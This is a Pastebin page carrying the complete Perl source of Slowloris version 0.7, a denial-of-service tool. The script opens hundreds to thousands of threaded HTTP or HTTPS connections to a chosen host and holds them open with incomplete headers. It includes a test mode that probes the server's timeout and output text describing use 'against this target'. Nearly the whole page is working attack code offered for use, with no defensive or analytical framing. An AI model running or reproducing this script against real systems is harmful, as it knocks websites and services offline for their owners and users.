API tools faq
paste
Advertisement
Guest User

slowloris.pl by mrvauxx

a guest
Jul 3rd, 2013
1,524
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.07 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -w
  2. use strict;
  3. use IO::Socket::INET;
  4. use IO::Socket::SSL;
  5. use Getopt::Long;
  6. use Config;
  7.  
  8. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
  9.  
  10. print <<EOTEXT;
  11. CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
  12. CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
  13. CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
  14. CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
  15. CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
  16. ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
  17. ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
  18. oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
  19. oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
  20. oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
  21. CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
  22. CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
  23. OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
  24. OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
  25. COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
  26. CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
  27. coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
  28. :ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
  29. .:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
  30. ....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
  31. .......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
  32. ...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
  33. .............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
  34. ..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
  35. . . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
  36. . .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
  37. . . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
  38. Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
  39. EOTEXT
  40.  
  41. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
  42. my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
  43. my $result = GetOptions(
  44. 'shost=s' => \$shost,
  45. 'dns=s' => \$host,
  46. 'httpready' => \$httpready,
  47. 'num=i' => \$connections,
  48. 'cache' => \$cache,
  49. 'port=i' => \$port,
  50. 'https' => \$ssl,
  51. 'tcpto=i' => \$tcpto,
  52. 'test' => \$test,
  53. 'timeout=i' => \$timeout,
  54. 'version' => \$version,
  55. );
  56.  
  57. if ($version) {
  58. print "Version 0.7\n";
  59. exit;
  60. }
  61.  
  62. unless ($host) {
  63. print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
  64. print "\n\tType 'perldoc $0' for help with options.\n\n";
  65. exit;
  66. }
  67.  
  68. unless ($port) {
  69. $port = 80;
  70. print "Defaulting to port 80.\n";
  71. }
  72.  
  73. unless ($tcpto) {
  74. $tcpto = 5;
  75. print "Defaulting to a 5 second tcp connection timeout.\n";
  76. }
  77.  
  78. unless ($test) {
  79. unless ($timeout) {
  80. $timeout = 100;
  81. print "Defaulting to a 100 second re-try timeout.\n";
  82. }
  83. unless ($connections) {
  84. $connections = 1000;
  85. print "Defaulting to 1000 connections.\n";
  86. }
  87. }
  88.  
  89. my $usemultithreading = 0;
  90. if ( $Config{usethreads} ) {
  91. print "Multithreading enabled.\n";
  92. $usemultithreading = 1;
  93. use threads;
  94. use threads::shared;
  95. }
  96. else {
  97. print "No multithreading capabilites found!\n";
  98. print "Slowloris will be slower than normal as a result.\n";
  99. }
  100.  
  101. my $packetcount : shared = 0;
  102. my $failed : shared = 0;
  103. my $connectioncount : shared = 0;
  104.  
  105. srand() if ($cache);
  106.  
  107. if ($shost) {
  108. $sendhost = $shost;
  109. }
  110. else {
  111. $sendhost = $host;
  112. }
  113. if ($httpready) {
  114. $method = "POST";
  115. }
  116. else {
  117. $method = "GET";
  118. }
  119.  
  120. if ($test) {
  121. my @times = ( "2", "30", "90", "240", "500" );
  122. my $totaltime = 0;
  123. foreach (@times) {
  124. $totaltime = $totaltime + $_;
  125. }
  126. $totaltime = $totaltime / 60;
  127. print "This test could take up to $totaltime minutes.\n";
  128.  
  129. my $delay = 0;
  130. my $working = 0;
  131. my $sock;
  132.  
  133. if ($ssl) {
  134. if (
  135. $sock = new IO::Socket::SSL(
  136. PeerAddr => "$host",
  137. PeerPort => "$port",
  138. Timeout => "$tcpto",
  139. Proto => "tcp",
  140. )
  141. )
  142. {
  143. $working = 1;
  144. }
  145. }
  146. else {
  147. if (
  148. $sock = new IO::Socket::INET(
  149. PeerAddr => "$host",
  150. PeerPort => "$port",
  151. Timeout => "$tcpto",
  152. Proto => "tcp",
  153. )
  154. )
  155. {
  156. $working = 1;
  157. }
  158. }
  159. if ($working) {
  160. if ($cache) {
  161. $rand = "?" . int( rand(99999999999999) );
  162. }
  163. else {
  164. $rand = "";
  165. }
  166. my $primarypayload =
  167. "GET /$rand HTTP/1.1\r\n"
  168. . "Host: $sendhost\r\n"
  169. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
  170. . "Content-Length: 42\r\n";
  171. if ( print $sock $primarypayload ) {
  172. print "Connection successful, now comes the waiting game...\n";
  173. }
  174. else {
  175. print
  176. "That's odd - I connected but couldn't send the data to $host:$port.\n";
  177. print "Is something wrong?\nDying.\n";
  178. exit;
  179. }
  180. }
  181. else {
  182. print "Uhm... I can't connect to $host:$port.\n";
  183. print "Is something wrong?\nDying.\n";
  184. exit;
  185. }
  186. for ( my $i = 0 ; $i <= $#times ; $i++ ) {
  187. print "Trying a $times[$i] second delay: \n";
  188. sleep( $times[$i] );
  189. if ( print $sock "X-a: b\r\n" ) {
  190. print "\tWorked.\n";
  191. $delay = $times[$i];
  192. }
  193. else {
  194. if ( $SIG{__WARN__} ) {
  195. $delay = $times[ $i - 1 ];
  196. last;
  197. }
  198. print "\tFailed after $times[$i] seconds.\n";
  199. }
  200. }
  201.  
  202. if ( print $sock "Connection: Close\r\n\r\n" ) {
  203. print "Okay that's enough time. Slowloris closed the socket.\n";
  204. print "Use $delay seconds for -timeout.\n";
  205. exit;
  206. }
  207. else {
  208. print "Remote server closed socket.\n";
  209. print "Use $delay seconds for -timeout.\n";
  210. exit;
  211. }
  212. if ( $delay < 166 ) {
  213. print <<EOSUCKS2BU;
  214. Since the timeout ended up being so small ($delay seconds) and it generally
  215. takes between 200-500 threads for most servers and assuming any latency at
  216. all... you might have trouble using Slowloris against this target. You can
  217. tweak the -timeout flag down to less than 10 seconds but it still may not
  218. build the sockets in time.
  219. EOSUCKS2BU
  220. }
  221. }
  222. else {
  223. print
  224. "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
  225.  
  226. if ($usemultithreading) {
  227. domultithreading($connections);
  228. }
  229. else {
  230. doconnections( $connections, $usemultithreading );
  231. }
  232. }
  233.  
  234. sub doconnections {
  235. my ( $num, $usemultithreading ) = @_;
  236. my ( @first, @sock, @working );
  237. my $failedconnections = 0;
  238. $working[$_] = 0 foreach ( 1 .. $num ); #initializing
  239. $first[$_] = 0 foreach ( 1 .. $num ); #initializing
  240. while (1) {
  241. $failedconnections = 0;
  242. print "\t\tBuilding sockets.\n";
  243. foreach my $z ( 1 .. $num ) {
  244. if ( $working[$z] == 0 ) {
  245. if ($ssl) {
  246. if (
  247. $sock[$z] = new IO::Socket::SSL(
  248. PeerAddr => "$host",
  249. PeerPort => "$port",
  250. Timeout => "$tcpto",
  251. Proto => "tcp",
  252. )
  253. )
  254. {
  255. $working[$z] = 1;
  256. }
  257. else {
  258. $working[$z] = 0;
  259. }
  260. }
  261. else {
  262. if (
  263. $sock[$z] = new IO::Socket::INET(
  264. PeerAddr => "$host",
  265. PeerPort => "$port",
  266. Timeout => "$tcpto",
  267. Proto => "tcp",
  268. )
  269. )
  270. {
  271. $working[$z] = 1;
  272. $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
  273. }
  274. else {
  275. $working[$z] = 0;
  276. }
  277. }
  278. if ( $working[$z] == 1 ) {
  279. if ($cache) {
  280. $rand = "?" . int( rand(99999999999999) );
  281. }
  282. else {
  283. $rand = "";
  284. }
  285. my $primarypayload =
  286. "$method /$rand HTTP/1.1\r\n"
  287. . "Host: $sendhost\r\n"
  288. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
  289. . "Content-Length: 42\r\n";
  290. my $handle = $sock[$z];
  291. if ($handle) {
  292. print $handle "$primarypayload";
  293. if ( $SIG{__WARN__} ) {
  294. $working[$z] = 0;
  295. close $handle;
  296. $failed++;
  297. $failedconnections++;
  298. }
  299. else {
  300. $packetcount++;
  301. $working[$z] = 1;
  302. }
  303. }
  304. else {
  305. $working[$z] = 0;
  306. $failed++;
  307. $failedconnections++;
  308. }
  309. }
  310. else {
  311. $working[$z] = 0;
  312. $failed++;
  313. $failedconnections++;
  314. }
  315. }
  316. }
  317. print "\t\tSending data.\n";
  318. foreach my $z ( 1 .. $num ) {
  319. if ( $working[$z] == 1 ) {
  320. if ( $sock[$z] ) {
  321. my $handle = $sock[$z];
  322. if ( print $handle "X-a: b\r\n" ) {
  323. $working[$z] = 1;
  324. $packetcount++;
  325. }
  326. else {
  327. $working[$z] = 0;
  328. #debugging info
  329. $failed++;
  330. $failedconnections++;
  331. }
  332. }
  333. else {
  334. $working[$z] = 0;
  335. #debugging info
  336. $failed++;
  337. $failedconnections++;
  338. }
  339. }
  340. }
  341. print
  342. "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
  343. sleep($timeout);
  344. }
  345. }
  346.  
  347. sub domultithreading {
  348. my ($num) = @_;
  349. my @thrs;
  350. my $i = 0;
  351. my $connectionsperthread = 50;
  352. while ( $i < $num ) {
  353. $thrs[$i] =
  354. threads->create( \&doconnections, $connectionsperthread, 1 );
  355. $i += $connectionsperthread;
  356. }
  357. my @threadslist = threads->list();
  358. while ( $#threadslist > 0 ) {
  359. $failed = 0;
  360. }
  361. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!